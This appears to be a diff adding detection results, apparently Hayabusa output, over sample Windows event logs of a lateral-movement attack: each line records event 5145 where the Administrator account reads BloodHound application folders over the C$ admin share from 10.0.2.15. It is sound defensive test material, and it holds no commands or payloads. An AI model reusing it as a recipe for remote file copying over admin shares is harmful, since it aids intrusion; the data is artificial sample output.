+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
